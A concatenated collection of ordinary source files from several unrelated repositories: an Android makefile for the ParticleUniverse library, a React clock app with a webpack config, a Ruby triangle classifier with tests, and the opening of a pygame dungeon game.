src/ParticleAffectors/ParticleUniverseLinearForceAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseParticleFollower.cpp \
src/ParticleAffectors/ParticleUniverseParticleFollowerTokens.cpp \
src/ParticleAffectors/ParticleUniversePathFollower.cpp \
src/ParticleAffectors/ParticleUniversePathFollowerTokens.cpp \
src/ParticleAffectors/ParticleUniversePlaneCollider.cpp \
src/ParticleAffectors/ParticleUniversePlaneColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseRandomiser.cpp \
src/ParticleAffectors/ParticleUniverseRandomiserTokens.cpp \
src/ParticleAffectors/ParticleUniverseScaleAffector.cpp \
src/ParticleAffectors/ParticleUniverseScaleAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseScaleVelocityAffector.cpp \
src/ParticleAffectors/ParticleUniverseScaleVelocityAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseSineForceAffector.cpp \
src/ParticleAffectors/ParticleUniverseSineForceAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseSphereCollider.cpp \
src/ParticleAffectors/ParticleUniverseSphereColliderTokens.cpp \
src/ParticleAffectors/ParticleUniverseTextureAnimator.cpp \
src/ParticleAffectors/ParticleUniverseTextureAnimatorTokens.cpp \
src/ParticleAffectors/ParticleUniverseTextureRotator.cpp \
src/ParticleAffectors/ParticleUniverseTextureRotatorTokens.cpp \
src/ParticleAffectors/ParticleUniverseVelocityMatchingAffector.cpp \
src/ParticleAffectors/ParticleUniverseVelocityMatchingAffectorTokens.cpp \
src/ParticleAffectors/ParticleUniverseVortexAffector.cpp \
src/ParticleAffectors/ParticleUniverseVortexAffectorTokens.cpp \
src/ParticleObservers/ParticleUniverseOnClearObserver.cpp \
src/ParticleObservers/ParticleUniverseOnClearObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnCollisionObserver.cpp \
src/ParticleObservers/ParticleUniverseOnCollisionObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnCountObserver.cpp \
src/ParticleObservers/ParticleUniverseOnCountObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnEmissionObserver.cpp \
src/ParticleObservers/ParticleUniverseOnEmissionObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnEventFlagObserver.cpp \
src/ParticleObservers/ParticleUniverseOnEventFlagObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnExpireObserver.cpp \
src/ParticleObservers/ParticleUniverseOnExpireObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnPositionObserver.cpp \
src/ParticleObservers/ParticleUniverseOnPositionObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnQuotaObserver.cpp \
src/ParticleObservers/ParticleUniverseOnQuotaObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnRandomObserver.cpp \
src/ParticleObservers/ParticleUniverseOnRandomObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnTimeObserver.cpp \
src/ParticleObservers/ParticleUniverseOnTimeObserverTokens.cpp \
src/ParticleObservers/ParticleUniverseOnVelocityObserver.cpp \
src/ParticleObservers/ParticleUniverseOnVelocityObserverTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoExpireEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoExpireEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoScaleEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoScaleEventHandlerTokens.cpp \
src/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandler.cpp \
src/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandlerTokens.cpp \
src/Externs/ParticleUniverseBoxColliderExtern.cpp \
src/Externs/ParticleUniverseBoxColliderExternTokens.cpp \
src/Externs/ParticleUniverseGravityExtern.cpp \
src/Externs/ParticleUniverseGravityExternTokens.cpp \
src/Externs/ParticleUniversePhysXActorExtern.cpp \
src/Externs/ParticleUniversePhysXActorExternTokens.cpp \
src/Externs/ParticleUniversePhysXBridge.cpp \
src/Externs/ParticleUniversePhysXFluidExtern.cpp \
src/Externs/ParticleUniversePhysXFluidExternTokens.cpp \
src/Externs/ParticleUniverseSceneDecoratorExtern.cpp \
src/Externs/ParticleUniverseSceneDecoratorExternTokens.cpp \
src/Externs/ParticleUniverseSphereColliderExtern.cpp \
src/Externs/ParticleUniverseSphereColliderExternTokens.cpp \
src/Externs/ParticleUniverseVortexExtern.cpp \
src/Externs/ParticleUniverseVortexExternTokens.cpp \
src/ParticleBehaviours/ParticleUniverseSlaveBehaviour.cpp \
src/ParticleBehaviours/ParticleUniverseSlaveBehaviourTokens.cpp
# Headers exported to any module that links against this static library.
LOCAL_EXPORT_C_INCLUDES :=
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/../include
# Headers used while compiling this module itself.
LOCAL_C_INCLUDES := $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES += $(LOCAL_OGRE_PARTICLE_UNIVERSE_INCLUDE)
# Source list — presumably the long .cpp list assembled above into
# LOCAL_OGRE_PARTICLE_UNIVERSE_SRC_FILES (definition not visible here; confirm).
LOCAL_SRC_FILES :=
LOCAL_SRC_FILES += $(LOCAL_OGRE_PARTICLE_UNIVERSE_SRC_FILES)
# Link the whole OgreMain static archive and build this module as a static lib.
LOCAL_WHOLE_STATIC_LIBRARIES := ogremain_static
include $(BUILD_STATIC_LIBRARY)
$(call import-module,../third_party/ogre/ogre_main)
"Markdown",
"CMake",
"Makefile",
"C++"
] | 37 | C++ | zhaoxiaofeng44/cocos2d-x-ogre | 6bf86a65a3e133ccc61b1851b8e329f00ed06ae5 | 41c426becf040e28023adede544f88b88a8c9529 |
refs/heads/master | <repo_name>djma777/zztrtr<file_sep>/src/components/Time.js
import React, { Component } from 'react'
class Time extends Component {
constructor(){
super();
this.state = {
time: new Date(),
}
this.runTime = this.runTime.bind(this)
}
runTime(){
this.setState({
time: new Date()
})
}
componentWillMount(){
console.log('will mount')
}
componentDidMount(){
console.log('did mount')
this.tick = setInterval(this.runTime, 1000)
}
componentWillUnmount(){
console.log('will unmount')
clearInterval(this.tick);
}
render(){
console.log('render')
return (
<section>
<h1>It is
<br/>
<time>{this.state.time.toLocaleTimeString()}</time>
</h1>
</section>
)
}
}
export default Time
<file_sep>/src/components/App.js
import React, { Component } from 'react';
import { render } from 'react-dom';
import Time from './Time'
// Root component: renders the greeting headline and the live clock.
class App extends Component {
  render(){
    return (
      <header className="text-center">
        <Hello />
        <Time />
      </header>
    )
  }
}
const Hello = () => (
<h1>Hello Universe!!!</h1>
)
export default App
<file_sep>/webpack.config.js
const { resolve } = require('path')
// Generates dist/index.html from the template and injects the bundle tags.
const HtmlWebpackPlugin = require('html-webpack-plugin')
const HtmlWebpackPluginConfig = new HtmlWebpackPlugin({
  template: resolve(__dirname, 'src/index.html'),
  filename: 'index.html',
  inject: 'body'
})
const webpack = require('webpack')
// Pulls compiled SCSS out of the JS bundle into its own .css file.
const ExtractTextPlugin = require('extract-text-webpack-plugin')
const ExtractSass = new ExtractTextPlugin({
  filename: '[name].[contenthash].css',
  // disable: process.env.NODE_ENV === 'development'
})
module.exports = (env = {}) => {
const isProduction = env.production === true
return {
entry: isProduction
? ['./src/index.js']
: [
'webpack-dev-server/client?http://localhost:2000',
'webpack/hot/only-dev-server',
'./src/index.js'
],
output: {
path: resolve(__dirname, 'dist'),
filename: '[name].bundle.js'
},
module: {
rules: [
{
test: /\.jsx?$/,
use: [
'babel-loader'
],
exclude: /node_modules/
},
{
test: /\.scss?$/,
use: ExtractSass.extract({
use:[
{
loader: 'css-loader'
},
{
loader: 'postcss-loader',
},
{
loader: 'sass-loader'
}
],
fallback: 'style-loader'
}),
exclude: /node_modules/
},
{
test: /\.(png|jpg|gif)$/,
loader: 'url-loader',
options: {
limit: '10000',
name: 'images/[hash:12].[ext]'
},
exclude: /node_modules/
}
]
},
devServer: {
hot: true,
contentBase: resolve(__dirname, 'dist'),
port: 2000,
open: true,
stats: {
colors: true
}
},
plugins: isProduction
? [
HtmlWebpackPluginConfig,
new webpack.optimize.UglifyJsPlugin(),
new webpack.DefinePlugin({
PRODUCTION: JSON.stringify(true)
}),
ExtractSass
]
: [
HtmlWebpackPluginConfig,
new webpack.optimize.UglifyJsPlugin(),
new webpack.HotModuleReplacementPlugin(),
new webpack.NamedModulesPlugin(),
new webpack.DefinePlugin({
DEVELOPMENT: JSON.stringify(true)
}),
ExtractSass
],
devtool: isProduction
? 'cheap-module-source-map'
: 'source-map'
}
}
<file_sep>/src/index.js
import React from 'react'
import { render } from 'react-dom'
import App from './components/App'
// Global styles are required here so webpack bundles them.
require('./sass/main.scss')
// Mount the application into the #root element.
render(
  <App />,
  document.getElementById('root')
)
// Accept hot-module updates in development so edits apply without a reload.
if(module.hot) {
  module.hot.accept()
}
| 6bc437ac365397d7b6a0b6cd0403b3b641680add | [
"JavaScript"
] | 4 | JavaScript | djma777/zztrtr | a6b50afdc4577dffc9321abd74e66163db3eaa9c | 37ef57a7897c0478424a2b8ca246484e1a517b5a |
refs/heads/master | <repo_name>SaraSpink/capybara_triangle<file_sep>/spec/triangles_spec.rb
require('rspec')
require('triangles')
# Specs for Triangle#is_triangle.  The last two examples had copy-pasted
# descriptions ("Identifies equilateral triangle") that did not match
# what they actually test; the descriptions now name the real case.
describe("#is_triangle") do
  it("Identifies equilateral triangle") do
    check = Triangle.new(3, 3, 3)
    expect(check.is_triangle).to eq("equilateral")
  end

  it("Identifies isoceles triangle") do
    check = Triangle.new(3, 3, 5)
    expect(check.is_triangle).to eq("isoceles")
  end

  it("Identifies scalene triangle") do
    check = Triangle.new(3, 4, 5)
    expect(check.is_triangle).to eq("scalene")
  end

  it("Identifies sides that do not form a triangle") do
    check = Triangle.new(3, 2, 6)
    expect(check.is_triangle).to eq("not a triangle")
  end
end
<file_sep>/lib/triangles.rb
# Classifies a triangle by the lengths of its three sides.
class Triangle
  def initialize(side1, side2, side3)
    @side1 = side1
    @side2 = side2
    @side3 = side3
    @type = nil
  end

  # Returns (and stores in @type) one of "equilateral", "isoceles",
  # "scalene" or "not a triangle" when the triangle inequality fails.
  def is_triangle
    sides = [@side1, @side2, @side3].sort
    distinct = sides.uniq.length
    @type =
      if sides[0] + sides[1] <= sides[2]
        "not a triangle"
      elsif distinct == 1
        "equilateral"
      elsif distinct == 2
        "isoceles"
      else
        "scalene"
      end
  end
end
require('sinatra')
require('sinatra/reloader')
also_reload('lib/**/*.rb')
require('./lib/triangles')
require('pry')
# Show the form where the user enters the three side lengths.
get ('/') do
  erb(:input)
end

# Classify the submitted sides and render the result page.
post ('/output') do
  side1 = params.fetch("side1").to_i
  side2 = params.fetch("side2").to_i
  side3 = params.fetch("side3").to_i
  triangle = Triangle.new(side1, side2, side3)
  @triangle_out = triangle.is_triangle
  erb(:output)
end
| d9cdcc2b8c583fd28bba93cb1fe03891d838d925 | [
"Ruby"
] | 3 | Ruby | SaraSpink/capybara_triangle | f7fff34221f2c2047bb3b0061ebb99943e98adac | a4dc46bf763d08760dddca72cdbafbdc19891172 |
refs/heads/stable/6.0 | <repo_name>Permyak-Logy/Underground-of-Knights<file_sep>/README.md
# PyGameProject
Проект по библиотеке PyGame
<file_sep>/run.py
import pygame
import os
import sys
from win32api import GetSystemMetrics
from random import choice
from random import randint
from math import sin, cos, atan, copysign
# Window-mode flags: main menu and in-game.  (The original comment also
# named MODE_SETTINGS, but no such mode is defined anywhere visible.)
MODE_MENU, MODE_GAME = 0, 1
DEBUG_INFO = True  # When True, extra debug information is printed to the console
class GameExample:
'''
Главный класс игры
'''
def __init__(self):
'''Инициализация'''
print('init Game') if DEBUG_INFO else None
pygame.init()
# Загрузка данных настроек
self.data_settings = self.load_settings()
# Создание переменной с функцианалом для музыки
self.music = pygame.mixer.music
# Установка громкости музыки
self.music.set_volume(float(self.data_settings['volume']))
# Инициализация разрешения окна
self.size = self.width, self.height = tuple(map(int, self.data_settings['matrix'].split('x')))
# Центрирование окна
self.center()
# Инициализация режима экрана и главного кадра игры
self.set_mode_display(self.size, self.data_settings['fullscreen'] == 'true')
# Загрузка меню
self.load_menu()
# Загруска игрового пространства
self.load_game_space()
# Установка титульного имени окна
pygame.display.set_caption('Underground of Knights')
# Установка иконки
pygame.display.set_icon(self.load_image('icon.png'))
# Скрытие курсора
pygame.mouse.set_visible(False)
# Некоторые переменныне в игре
self.mode = None # Режим окна
self.image_arrow = pygame.transform.scale(self.load_image('arrow.png', -1), (22, 22)) # Картинка курсора
def mainloop(self):
''' Главный цикл программы '''
print('\n-----Game started------') if DEBUG_INFO else None
self.start_screen_opening() # Начало загрузочного экрана
self.open_menu() # Открытие меню
while True:
# Проверка событий
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.terminate()
if event.type == pygame.MOUSEBUTTONDOWN:
self.mouse_press_event(event)
if event.type == pygame.KEYDOWN:
self.key_press_event(event)
# Отрисовка экрана
self.main_screen.fill(pygame.Color('black'))
if self.mode == MODE_MENU:
# Обмновление меню
self.menu.update()
# Рисование меню
self.menu.render(self.main_screen)
if self.mode == MODE_GAME:
# Обновление игрового пространства
self.game_space.update()
# Рисование ирового пространства
self.game_space.render(self.main_screen)
if pygame.mouse.get_focused():
# Отрисовка курсора
self.main_screen.blit(self.image_arrow, (pygame.mouse.get_pos()))
self.main_screen.blit(pygame.font.Font(None, 20).render(
f'''fps: {(round(self.game_space.clock.get_fps()) if self.mode == MODE_GAME else
round(self.menu.clock.get_fps()))}''', 0,
(255, 255, 255)), (0, 0)) # Отображение FPS в игре
# Обновление дисплея
pygame.display.flip()
    def center(self):
        """Center the game window on the desktop.

        Works only if called before pygame.display is initialised: the
        position is passed through SDL environment variables, which are
        read when the display is created.
        """
        # Top-left corner that centres a self.width x self.height window
        # on the primary monitor (GetSystemMetrics(0/1) = screen w/h).
        pos_x = GetSystemMetrics(0) / 2 - self.width / 2
        pos_y = GetSystemMetrics(1) / 2 - self.height / 2
        os.environ['SDL_VIDEO_WINDOW_POS'] = '%i,%i' % (int(pos_x), int(pos_y))
        os.environ['SDL_VIDEO_CENTERED'] = '0'
@staticmethod
def load_settings() -> dict:
"""Загрузка настроек из файла data\settings data"""
result = {}
with open('data\settings data', encoding='utf8') as file:
data = file.readlines()
for elem in data:
key, val = elem.split()
result[key] = val
return result
@staticmethod
def load_image(name, colorkey=None) -> pygame.Surface:
'''
Возвращает картинку с именем name. Если есть colorkey, то у картинки делается фон прозрачным.
Если colorkey == -1 то берётся цвет из самого верхнего угла картинки, иначе ...
'''
fullname = os.path.join('data\images', name)
image = pygame.image.load(fullname).convert()
if colorkey is not None:
if colorkey == -1:
colorkey = image.get_at((0, 0))
image.set_colorkey(colorkey)
else:
image = image.convert_alpha()
return image
def load_menu(self):
'''Загруска меню'''
print('\tinit menu:\n') if DEBUG_INFO else None
# Сокращение некоторых функций
_Font = pygame.font.Font
_SysFont = pygame.font.SysFont
_Color = pygame.Color
# Создание меню
self.menu = Menu(self)
# fonts = ['consolas', 'cuprum', 'gabriola', ''] # Красивые шрифты
# Пункты меню
self.menu = Menu(self) # Создание меню
# Надпись названия игры
label_title = Punkt(text='Underground of Knights', pos=(int(self.width * 0.4), int(self.height * 0.15)),
size=-1, show_background=False, color_text=_Color('white'), number=0,
font=_SysFont('gabriola', self.height // 10), bolden=False)
# Кнопка "Играть"
btn_play = Punkt(text='Играть', pos=(int(self.width * 0.05), int(self.height * 0.8)), size=-1,
show_background=False, color_text=_Color('green'), number=1,
font=_SysFont('gabriola', self.height // 20), func=self.start_game)
# Кнопка "Руководство"
btn_guide = Punkt(text='Руководство', pos=(int(self.width * 0.55), int(self.height * 0.8)), size=-1,
show_background=False, color_text=_Color('white'), number=2,
font=_SysFont('gabriola', self.height // 20), func=self.open_guide)
# Кнопка "Выход"
btn_exit = Punkt(text='Выйти', pos=(int(self.width * 0.8), int(self.height * 0.8)), size=-1,
show_background=False, color_text=_Color('red'), number=3,
font=_SysFont('gabriola', self.height // 20), func=self.terminate)
# Анимация мерцания света
animate_light = AnimatedPunkt.Blinking(int(self.width * 0.5), int(self.height * 0.345),
(int(self.height * 0.45), int(self.height * 0.45)),
self.menu.animated_punkts_group)
# Анимированный свет фонаря
pygame.draw.circle(animate_light.image, _Color("yellow"),
(animate_light.rect.width // 2, animate_light.rect.height // 2),
animate_light.rect.width // 2)
animate_light.image.set_colorkey(animate_light.image.get_at((0, 0)))
# Текст руководства
self.text_guide = """\n\n
\bУправление\b \n\n\n
\bW\b - Движение вперёд \n
\bS\b - Движение назад \n
\bA\b - Движение вправо \n
\bD\b - Движение влево \n
\bZ\b - Выбросить броню \n
\bQ\b - Смена оружия \n
\bEsc\b - Выход в меню \n
\bP\b - Пауза \n
\bE\b - Вход в портал \n
"""
# Невидимая кнопка закрытия руководства
btn_close_guid = Punkt(pos=(0, 0), size=self.size, show_background=False, number=4, func=self.close_guide)
btn_close_guid.hide()
list_lines_guid = [] # Список всех пунктов которые позволят отобразить весь текст руководства
for i, elem in enumerate(self.text_guide.split("\n")):
# Строчка
line = Punkt(text=elem, pos=(0, i * int(self.height * 0.04)), size=-1, show_background=False, bolden=False,
color_text=_Color("white"), number=i + 5, font=_Font(None, int(self.height * 0.05)))
line.hide()
list_lines_guid.append(line)
# Добавление пунктов в меню
self.menu.add_punkts(label_title, btn_play, btn_guide, btn_exit,
btn_close_guid, *list_lines_guid) # Добавление пунктов
def load_game_space(self):
'''Загрузка ирового пространства'''
print('\tinit game space:\n') if DEBUG_INFO else None
# Сокращение некоторых функций
_Font = pygame.font.Font
_SysFont = pygame.font.SysFont
_Color = pygame.Color
# Создание игрового пространства
self.game_space = GameSpace(self)
# Кнопка "Exit"
btn_exit = Punkt(text='Выход', pos=(int(self.width * 0.01), int(self.height * 0.01)), size=-1,
show_background=False, color_text=_Color('yellow'), number=5,
font=_SysFont('gabriola', self.height // 20), func=self.open_menu)
# Кнопка "Pause"
btn_pause = Punkt(text="Пауза", pos=(int(self.width * 0.01), int(self.height * 0.07)), size=-1,
show_background=False, color_text=_Color('yellow'), number=6,
font=_SysFont('gabriola', self.height // 20), func=self.set_pause)
# Изображение "PAUSE"
label_pause = Punkt(text='ПАУЗА', pos=(int(self.width * 0.2), int(self.height * 0.4)), size=-1,
show_background=False, color_text=_Color('blue'), number=7, bolden=False,
font=_SysFont(None, self.height // 2))
label_pause.hide()
# Размеры Punkt у элементов отображения текущего и вторичного оружия
size = tuple([int(self.height * 0.14)] * 2)
# Изображение текущего оружия
label_cur_weapon = Punkt(text='None', pos=(int(self.width * 0.05), int(self.height * 0.6)),
size=size, show_background=False, color_text=_Color("white"),
number=8) # func=self.game_space.player.change_weapons # Привязывается после new_game
# Изображение второго оружия
label_second_weapon = Punkt(text='None 2', pos=(int(self.width * 0.05), int(self.height * 0.75)),
size=size, show_background=False, color_text=_Color("white"),
number=9) # func=self.game_space.player.change_weapons
# Размеры полосок здоровья и щитов
size = (int(self.width * 0.2), int(self.height * 0.05))
# Полоска здоровья
label_health = Punkt(text='Здоровье: 000', pos=(int(self.width * 0.78), int(self.height * 0.8)), size=size,
font=_SysFont('gabriola', int(self.height * 0.05)), bolden=False,
color_text=_Color('white'), color=(60, 60, 60),
show_background=False, number=10)
# Полоска щитов
label_shields = Punkt(text='Щиты: 000', pos=(int(self.width * 0.78), int(self.height * 0.8) + size[1]),
size=size, font=_SysFont('gabriola', int(self.height * 0.05)), bolden=False,
color_text=_Color('white'), color=(60, 60, 60),
show_background=False, number=11)
# Полоска энергии
label_energy = Punkt(text='Энергия: 000', pos=(int(self.width * 0.78), int(self.height * 0.8) + size[1] * 2),
size=(size[0], size[1] // 2), color=(60, 60, 60), color_text=_Color('black'),
show_background=False, number=12, bolden=False)
# Показатель брони
label_armor = Punkt(text='Броня: 00000', pos=(int(self.width * 0.85), int(self.width * 0.05)), size=-1,
font=_SysFont('gabriola', int(self.height * 0.05)), bolden=False, show_background=False,
number=13, color_text=_Color('white'))
# Показатель скорости бега
label_sprint_speed = Punkt(text='Скорость: 0000', font=_SysFont('gabriola', int(self.height * 0.05)), size=-1,
pos=(int(self.width * 0.85), int(self.width * 0.05 + label_armor.get_size()[1])),
bolden=False, show_background=False, number=14, color_text=_Color('white'))
# Показатель текущего уровня карты
label_number_level = Punkt(text='Уровень 000', font=_SysFont('gabriola', int(self.height * 0.05)), size=-1,
pos=(int(self.width * 0.4), int(self.width * 0.05)), bolden=False,
show_background=False, number=15, color_text=_Color('white'))
label_number_level.number_level = 0
# Надпись сообщения которое появится по окончании игры
label_message = Punkt(text='None', font=_SysFont('gabriola', int(self.height * 0.4)),
pos=(0, 0), bolden=False, size=self.size, show_background=False, number=16,
color_text=_Color('white'), func=self.open_menu)
# Добавление пунктов в игровое пространство
self.game_space.add_punkts(btn_exit, btn_pause, label_pause, label_cur_weapon,
label_armor, label_energy, label_sprint_speed,
label_second_weapon, label_health, label_shields,
label_number_level, label_message) # Добавление пунктов
def mouse_press_event(self, event):
'''События мыши'''
print(f'{self.__class__}.mouse_press_event()') if DEBUG_INFO else None
if self.mode == MODE_MENU:
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
# Проверяет элементы после нажатия мышкой кнопкой "1"
self.menu.check_on_press_punkts(event.pos)
elif self.mode == MODE_GAME:
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
# Проверяет элементы после нажатия мышкой кнопкой "1"
if self.game_space.check_on_press_punkts(event.pos):
# Проверка на нажатие punkt
pass
elif self.game_space.pause_status:
# Если пауза то убрать её и больше ничего не делать
self.unset_pause()
elif self.game_space.player.take_thing(event.pos):
# Проверка на поднятие вещи в позиции event.pos
pass
else:
# Начать атаку позиции event.pos
self.game_space.player.attack(event.pos)
def key_press_event(self, event):
'''События клавиатуры'''
print(f'{self.__class__}.key_press_event()') if DEBUG_INFO else None
if self.mode == MODE_GAME:
if event.key == pygame.K_p:
# Установка и убирание паузы при нажатии клавиши P
if self.game_space.pause_status:
self.unset_pause()
else:
self.set_pause()
elif event.key == pygame.K_ESCAPE:
# Открытие меню при нажатии на Escape
self.open_menu()
elif event.key == pygame.K_q:
# Смена оружия при нажатии на Q
self.game_space.player.change_weapons()
elif event.key == pygame.K_z:
# Сброс брони при нажатии на Z
old_thing = self.game_space.player.things.get("armor")
if old_thing is not None:
self.game_space.player.things["armor"] = None
old_thing.put(self.game_space.player.rect.x, self.game_space.player.rect.y)
elif event.key == pygame.K_e:
# Заход в портал при нажатии на E
if not pygame.sprite.groupcollide(self.game_space.player_group,
self.game_space.transitional_portal_group,
False, False):
return # Для использования нужно быть рядом с порталом
if self.game_space.enemies_group.sprites():
return # Должны быть убиты все враги
self.game_space.generate_level(self.game_space.get_next_level())
def start_game(self):
'''Начать игру'''
print('GameExample.start_game()') if DEBUG_INFO else None
self.mode = MODE_GAME # Установка режима MODE_GAME
self.game_space.new_game() # Начало новой игры в game_space
self.unset_pause() # Убирание паузы
self.music.pause() # Остановка музыки
self.game_space.clock.tick() # Сброс времени с последнего тика
def open_menu(self):
'''Открывает меню'''
print('GameExample.open_menu()') if DEBUG_INFO else None
self.mode = MODE_MENU # Установка режима MODE_MENU
self.set_pause() # Установка паузы
# Загрузка музыки
self.music.load('data\music\main_menu.mp3')
self.music.play(-1)
self.menu.clock.tick() # Сброс времени с последнего тика
def open_guide(self):
'''Открывает руководство'''
print(f'{self.__class__}.open_guide()') if DEBUG_INFO else None
n = len(self.text_guide.split("\n")) # Количество строчек в тексте
[self.menu.get_punkt(i).hide() for i in range(4)] # Сокрытие пунктов меню
[self.menu.get_punkt(i).show() for i in range(4, 5 + n)] # Показ пунктов руководства
def close_guide(self):
'''Закрывает руководство'''
n = len(self.text_guide.split("\n")) # Количество строчек в тексте
[self.menu.get_punkt(i).show() for i in range(4)] # Показ пунктов меню
[self.menu.get_punkt(i).hide() for i in range(4, 5 + n)] # Сокрытие пунктов руководства
def set_mode_display(self, size, bool_full_screen):
'''Устанавливает полноэкранный и неполноэкранный режим'''
if bool_full_screen:
self.main_screen = pygame.display.set_mode(size,
pygame.HWSURFACE |
pygame.DOUBLEBUF |
pygame.FULLSCREEN)
else:
self.main_screen = pygame.display.set_mode(size)
def set_pause(self):
'''Устанавливает паузу в GameSpace'''
print(f'{self.__class__}.set_pause()') if DEBUG_INFO else None
self.game_space.pause_status = True # Установка паузы
# Сокрытие пунктов выход и пауза
self.game_space.get_punkt(5).hide()
self.game_space.get_punkt(6).hide()
# Показ надписи паузы
self.game_space.get_punkt(7).show()
def unset_pause(self):
'''Убирает паузу в GameSpace'''
print(f'{self.__class__}.unset_pause()') if DEBUG_INFO else None
self.game_space.pause_status = False # Деустановка паузы
# Показ пунктов выход и пауза
self.game_space.get_punkt(5).show()
self.game_space.get_punkt(6).show()
# Скрытие надписи паузы
self.game_space.get_punkt(7).hide()
def start_screen_opening(self):
'''Зашрузочная заставка'''
print(f'{self.__class__}.start_screen_opening()') if DEBUG_INFO else None
# Логотип PyPLy
logo_PyPLy = self.load_image('PyPLy.png', colorkey=-1)
logo_PyPLy = pygame.transform.scale(logo_PyPLy,
(int(logo_PyPLy.get_width() * (self.width // 640) * 0.5),
int(logo_PyPLy.get_height() * (self.height // 360) * 0.5)))
# Логотип DeusVult
logo_DeusVult = self.load_image('DeusVult.png', colorkey=-1)
logo_DeusVult = pygame.transform.scale(logo_DeusVult,
(int(logo_DeusVult.get_width() * (self.width // 640) * 0.5),
int(logo_DeusVult.get_height() * (self.height // 360) * 0.5)))
# Логотип PyGame
logo_PyGame = self.load_image('PyGame.png', colorkey=-1)
logo_PyGame = pygame.transform.scale(logo_PyGame,
(int(logo_PyGame.get_width() * (self.width // 640) * 0.27),
int(logo_PyGame.get_height() * (self.height // 360) * 0.27)))
clock = pygame.time.Clock() # Часы для точного показа анимации
for image in [logo_PyPLy, logo_DeusVult, logo_PyGame]:
alpha = 0 # Начальный показатель alpha канала
manifestation_rate = 100 # Скорость проявления исзображения в %/сек
continuation_time = 1 # Сколько времени осталось показывать изображение после его полного отображения
fade_rate = 400 # Скорость угасния исзображения в %/сек
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.terminate()
if event.type == pygame.MOUSEBUTTONDOWN:
running = False
if event.type == pygame.KEYDOWN:
running = False
tick = clock.tick() # Получение времени с предыдущего tick
if alpha < 200 and continuation_time > 0:
# Проявление image в самом начале путём увеличения alpha канала
alpha += manifestation_rate * 2 * tick / 1000
elif continuation_time > 0:
# Отсчёт оставшегося времени показа
continuation_time -= tick / 1000
elif alpha >= 0 and continuation_time <= 0:
# Скрытие изображения путём уменьшения alpha канала
alpha -= fade_rate * 2 * tick / 1000
else:
# Как только анимация заканчивается перейти к следующиему изображению
running = False
# Заливка главного кадра
self.main_screen.fill(pygame.color.Color('black'))
image.set_alpha(alpha) # Установка alpha канала
# Наложение изображения на главный кадр
self.main_screen.blit(image, (self.width // 2 - image.get_width() // 2,
self.height // 2 - image.get_height() // 2))
pygame.display.flip()
@staticmethod
def terminate():
'''Выход из игры, и завершение главного цикла'''
print('terminate()') if DEBUG_INFO else None
pygame.quit()
print('-----Game closed-----') if DEBUG_INFO else None
sys.exit()
class Menu:
    """The game's main menu: keeps a list of UI punkts and renders them."""

    def __init__(self, game, punkts=None):
        """Bind the menu to ``game`` and prepare the scaled background."""
        self.game = game
        raw_background = self.game.load_image('background menu.png')
        self.image_background = pygame.transform.scale(raw_background, self.game.size)
        self.punkts = [] if punkts is None else punkts
        self.animated_punkts_group = pygame.sprite.Group()
        self.clock = pygame.time.Clock()

    def update(self):
        """Advance the animated punkts by the time since the last tick."""
        self.animated_punkts_group.update(self.clock.tick())

    def render(self, screen):
        """Draw the background, every punkt, then the animated sprites."""
        screen.blit(self.image_background, (0, 0))
        cursor_pos = pygame.mouse.get_pos()
        for punkt in self.punkts:
            punkt.draw(screen, ispressed=punkt.get_focused(cursor_pos))
        self.animated_punkts_group.draw(screen)

    def add_punkt(self, punkt):
        """Register a single punkt."""
        self.punkts.append(punkt)

    def add_punkts(self, *punkts):
        """Register several punkts at once."""
        self.punkts.extend(punkts)

    def get_punkt(self, number):
        """Return the punkt whose ``number`` matches, or None."""
        return next((p for p in self.punkts if p.number == number), None)

    def check_on_press_punkts(self, pos):
        """Return True as soon as some punkt handles a click at ``pos``."""
        return any(punkt.on_click(pos) for punkt in self.punkts)
class GameSpace:
    '''
    The game space: owns the queued levels, every sprite group, the player,
    the battle HUD widgets (punkts) and the camera.
    '''

    def __init__(self, game, punkts=None):
        self.game = game  # back-reference to the owning game object
        self.punkts = punkts if punkts is not None else list()  # HUD widgets
        self.levels = []  # queued level maps
        self.pause_status = False  # True while the game is paused
        self.size_cell = int(self.game.height * 0.2)  # grid cell size in pixels
        self.is_finished = False  # True once the game has ended
        self.all_sprites = pygame.sprite.Group()  # every sprite
        self.player_group = pygame.sprite.Group()  # the player sprite
        self.enemies_group = pygame.sprite.Group()  # enemy sprites
        self.walls_group = pygame.sprite.Group()  # wall sprites
